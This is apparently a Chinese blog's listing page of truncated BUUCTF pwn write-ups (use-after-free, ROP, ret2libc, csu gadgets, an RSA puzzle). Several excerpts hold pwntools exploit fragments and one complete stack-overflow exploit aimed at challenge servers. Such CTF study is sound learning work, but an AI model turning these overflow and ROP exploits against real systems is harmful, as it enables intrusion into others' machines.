m0_64236521的博客

[HCTF 2018]admin1

md5绕过

hitcontraining_uaf1这里一次会申请两个堆，其中第一个堆放着print_note_content前4个字节位是print_note_content函数地址，这个堆块儿存在了notelist中在执行print_notet时，会调用notelist里存储print_note_content函数地址的堆块儿，及我们只需将notelist里堆块儿存的print_note_content函数地址改成后门函数地址即可申请两个堆块儿释放掉0x10里有两个堆，都是之前存...

buuctf|inndy_rop1

buuctf|ciscn_2019_s_3 1如下图明显的栈溢出这里调用了系统号为0x3B(十进制为59)的函数，查下表是exeve(‘/bin/sh’,0,0)，为了控制寄存器使其第一个参数为/bin/sh，其余为0，需要用到csu控制寄存器exp如下from pwn import*#p=process('./pwn_30')p=remote('node4.buuoj.cn',27704)pop_bx_bp_12_13_14_15=0x40059Acsu_2=0x400580s

buuctf|[HarekazeCTF2019]baby_rop 1分析下载文件重命名为pwn_15,checksec一下只开启了NX,64位，用ida看看这里可以栈溢出，同时在侧面看到了system()shift+F12查看字符串找到binsh，由于是64位，我们要寄存器传参，ROPgadget下exp如下from pwn import*p=remote('node4.buuoj.cn',25977)#p=process("./pwn_15")system_addr=0x

ciscn_2019_en_2 1下载后我重命名为pwn_14了checksec一下nx开启，可以栈溢出64位，用ida看看分析下，只有输入‘1’有用，即encrypt函数较为重要，进入encrypt有gets(s)，可以进行栈溢出，没有找到后门函数。那基本思路有了，这里可以栈溢出，但要绕过strlen判断，之后就是基本的ROP,ret2libc。exp如下from pwn import*from LibcSearcher import*context(os='linux', ar

方法一我将文件下载后将其重命名为pwn_13，checksec一下可以直接栈溢出，32位，进入idagets(v4)可以栈溢出，这里没找到后门函数，只发现了get_flag函数，进去看看只要a1,a2满足值便可以输出flag，a1和a2是函数参数，我们可以进行传入，同时为了让get_flag正常结束，我们要使其返回函数为exit()exp如下from pwn import*p=remote('node4.buuoj.cn',26832)context.log_level='debu

buuctf|warmup_csaw_2016 1下载文件运行如下checksec查看下保护file一下，是64位文件拉进ida，发现gets(v5),查看v5,明显的栈溢出找到system，地址40060d直接expfrom pwn import*p=remote('node4.buuoj.cn',28415)payload=b'A'*0x48+p64(0x40060D)p.sendline(payload)p.interactive()得flag...

我们可以看到两个文件，根据题目，是rsa加密,如果不太了解rsa加密的可以去https://blog.youkuaiyun.com/gao131360144/article/details/79966094看看将pub.key用记事本打开得到加密公钥再进入http://www.hiencode.com/pub_asys.html对公钥进行解析，我们便得到了e,n在http://factordb.com/对n进行分解得p,q在这里我们要用到RSA Tool2 by ET!在工具里我们拿到了